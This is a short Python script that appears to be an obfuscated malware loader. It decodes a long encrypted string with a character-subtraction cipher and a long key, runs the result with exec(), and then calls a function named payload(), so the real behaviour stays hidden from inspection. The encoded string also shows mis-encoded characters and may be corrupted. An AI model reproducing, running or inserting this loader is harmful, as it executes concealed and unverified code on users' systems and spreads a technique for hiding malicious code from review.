666666666
# -*- coding: utf-8 -*-
encrypted_string="\x½ÎÑéµÍsÒévááÖÜÃ¶e³ÇçÔÂ»k·ØäãÌàÖ¯×¶ËÒÖ³ÀÕçÊÃÄ»Å¾´ÌXÇè¨Ë¸ÑÈÈëÊ´»ÓÔÂ¿±ÒÀ¹{Ðã²²»³{ØÓçÕ¢ÎÛµÏ³ß²ÆÇÈo_ªÒµpÊÙÖÖ½ Õ­Tre¿¨ÁÎÖ´{rÖÃ¬×¦ÏÃº¼Ü}¸ajÝÀË×tvÊ³Æk±¥À·âÒånÍ§sât[LÇØËa¾ØáµÈ¿ÖÌßç­Å©½ÉµÓ¿¿³¯Ô¸ÓawÀÜ½¶´¼¶qrÇàÖÍ¿¯p»º±²Ñ§Þ°ÚÜÞÓÁwzvnÈ¸àè¿¯ »×ÞØÂÓÔÝå¼¸ÊÔ±Ä¶Ã´ÉÈ½ìÃyiÏÇä«ËÛÅ¶¾àÏßÝÅÀ·¬³Ïç½ÚÙ~L`kÐÏ¹¬ÊµÅ®äØ¯Å»²ãÈ{~¢yaÛ×â¯è«¶ÛÈÄÊ¾¼º»ÇÉ{à×ï³r®Ó°½ò¸åÜÚ°p¾ï·â|²Õá®oÓÜãquéØÝºÕÕ¹ÐÊ¸ñååÜÔfuÁ­ð[^Û¿Ü§ää®©½ÓåÓ·±ãæ»ä¸ÏàÑèâ~fcÁÔ¹©vÆÊÈÐiÂ¢èÍ}¹gÂÙ¹ÞRocwl¶ÁµÉÒÒ©²¾ÀÓÖt¨çíÛ¢hÕ¸{·ª×Î¢ymxÀ»½áÙµ¿ß²¢ÀÚuÚhwÂÛ¾È VxrtauckÌÃ¿ÁÈÊàÈÅëÞË°²|bèÁádÆ®Ä¬ÇÚÓÜÓÐxÙÇl{h¨¤¬¡y¤¨¨Ävv¶«ÌÇØÐÐ²§éÇ³ãÓcyuÄ²ÎÖÖÝ³æ×«á­¦ãkwÉÀåÌ³qexjhbhÓÂ©ÀðÃÈË«¤ÃÜÂra«¬×ÐÑ¾µßÔ¶áÞÁpkpnsfÙª²Æ¾¯¼¶»ã´hlÊ¨ªq×±§ÃÕµkÅté¡©yvbÓ´·¿Öæ~i¤ÖÐ¼»vªáÊsÑ¼­ÈjÄ¿¸Ól§ÉÃÚÐcàÁñ¼µØÞz£Ä·©¶µÍ§°¦¹ÀÖÐÚÞÊáÃ´êØ´ÆÌµÄ½äÏ{ÜÇËÄÃ»ºÙ¹sÍÒÄª²Ò¾Æ¾Õ°ØÓxunfLfffrxÓÓììÔéº||¥z¨|¯ ÇdvË¹±¼ä¾ qÉÜà¦esÂ¶ÎÛ¤ß½Úµ¼Ø¡ØÀÉ¶à¨£pwilÌÄ´ãÎÉÖ¯ØqgÆÑttµÓñ«uuuà°Å®Ðå¸¾¬ytÆÝêq­Þær¶ª»¶¢©¹sn¢qk¬­àÔ´É»ÕÐ¾xy¶Ôgiz~¬¥®y}{ ÈÑ»½®Úµ¨°¸¼Þ{zST©ÍàyÉÒáåéÖÌ`h­¿ÃÊÉ¿ÌvxÊÖÙvÇµØÔ¸fÒÐÐÖ¾É½Òt~xSxltlÚÕçÊÙã·ßÛiÙÓç×ÚËÍ§ÃÃÎ´Á~¸·±ÔÄgz¥ºÛUallhnr¨Éæ¯Éá·¸ºÐ²â½­Ü±ÑjêÄ»¼tz¸ÔÑ­P´ÖçºÙ¼fÔÑÊáÍääÞsg³ç²Ê¸ÝìåÕ±¾æoÖÃÍè´§zÎÄ¿»ÜÒwÆÜÅÀßÒÀ¼áÂ¯s®»À®ÔÅµ¹ÁÄväÝÆ«¯ÎÞ¢ëÈ×Ûzltj¯l£v½ÖÍàÅtzngÔØØÅÕ¡n¥¹¤Ä¿¡ÂcÅÅÅÂ©¶º dlkuÉ²×¼¹ç­º¦¶Ãl¦³bbciPäì½ÑÞo«·¡¤¥ÂÍlÂÆm¤¹·ÃáãÜy²mbl¼¸¶­lm¹ºÀÉÓjÏÐè§È­|©®Ã¯½kÅº¦zÌÍ»ÁÀvÇÕ¯¢ÐÆìÔºoÊnxx¿¸ÍguËÉêÈ¥ÒÒÅ¹²ÂeÏri¼¿°®¼Ër½Ç²º}psê½é¿³ÅÒË£Ê¹¼©Í±µ¨Wfyzdzo"
key="RnTaazCYScvlxtfmQBEAfypSNaNkttZlppAjUWonvJSexXOeQGSUFeNyXujEcThVpYxXZSGkbpYMCqSTSapQBQGKMwqteAZssVpMvFahinFdUFmOPWagdYJQtbWYsJRErsMCMYdFuTtDlTCitCgQfKJxUWaAeJnNghuKrVdDTKPsCbWIihiuFZvGojfKQzBcseALwsQYRwYkuDWBdJUCjQXFNAmDkpLzvAWlTwIBOJCQVRTlddQHBZGNIhHrKfhyaNmiZVNVSlsMAdyjiQhujgPrfyvOfUbeHaQaWOUTXzPPIiXreBzbmnSUPyjYliSWIEgjyVfqUjBVzaljStEeAfEvrJbGItZSUhziYwAprirvJHwYWkKHHRYbSmnuNchbgcuIeMKyHqwvfsPKwHpTNtmMCrhwjkvQUmhwsiEcgpTbgFxuqwpFIoVHwQxTwZvrFppMFUtqdXAqwTrWbpkpptzZHtpFbCJkEAVWZcbARAteQopGvVGafvGxdHbjOCWeLeGOLbidHFxWgqTnmtyiheHcRMEEvjzdoaMwXIRIyyjEZqhBALrTUthFNwahoLbfLXfRTAUCKfZMNTOarcrwlbBKfBBuMooRDTHSRGfvgseklrnsyqrpaLSFrnhvKkCnrLVhVnTVPBZTdOgbMTuUJulrIYixioaYdUMIZncgmNxZgJmEzxrlIVWhMnxfygEXrtJvzpHBrHnTFNwSTfGxwXwIRLADGcqhPOzqBxoSHhaePNctSxzmFkavBIZZPHURwvwrFaJfCDQsLDTqPCRCkvixoyYVwBaOCJdxjWBvlaSMNGyXKbJIpgAoYeUMTcqoVLAZQwyfnCwSqwSEqeOUkHuzhIEUAljLAVQrkqupgoJDvsPgYARTvhOqbRhhUVBtVKiqPIdVdNeEiAwoPLlLDBfFjcmFFgoRXhfmluzkuUTZoDrVhfNFyDYApIrTuhJMSvWfQThzonEUIrfHwjrimimAmDjAWtBeLWMrAfNPIAgVQqUYbJtFZEjcqVTMJnxnSfUqUuKLeeoiRbrODGQRIvSixIAyxJRIGUuyitdxMKLNwQKIEwhPjGtgRXfRZfaGUrBDHvaoxCGEDZrdnbITGqGGDPOPyRpIzJEhzYYqhyzuhgnXVxHirGPQaXZPXJXfmgJeaLloEFibwacZGhQgLtPVoTIXlxuoLTLtfuwdpwRyvmIsezvfheRAZWZOOVRNEoQkGyPwJboXQKbpALirLHNuRtGUrNfyXDKqBpNFjPdBxULHVgcESwWtRkeHsFektiKiwKgHFblYlhqpkySbGtAnYmuMYCxyqbcJYrWMnOYxAmUKkUMLnqJShdLlccRPxTJDBHLNAsQXKFRVPwtXBBmrewVbveQbmuTJKLfVKplZqWLupbNoGdfoWayLLVHjJcnvLLoCrqJqyLUmwMraZtLKUcCeyDcPygICkVEBbEIywBBCIGtzTcjuMhhLVQptapcfgLJkKAJBUmqcWUcBBzLywcAZeLsdMFFNeQxHlouBUePSYmdzfmpjjKCvDNalvuOgYYIYIeTSfKAWJeyoGMmhNbXqXFYFkpzNrExJgXUxhPJonmdEJOCrbcGuGbxzoZtxRixnyFCbNleSwIwqGXzQcgBQuWHYIBnKgqMFYbgqZpe"
size=1647
def decode(s1,s2):
    return ''.join(chr(ord(a) - ord(b)) for a,b in zip(s1,s2))
data=decode(encrypted_string,key)
exec(data)
payload()
666666666
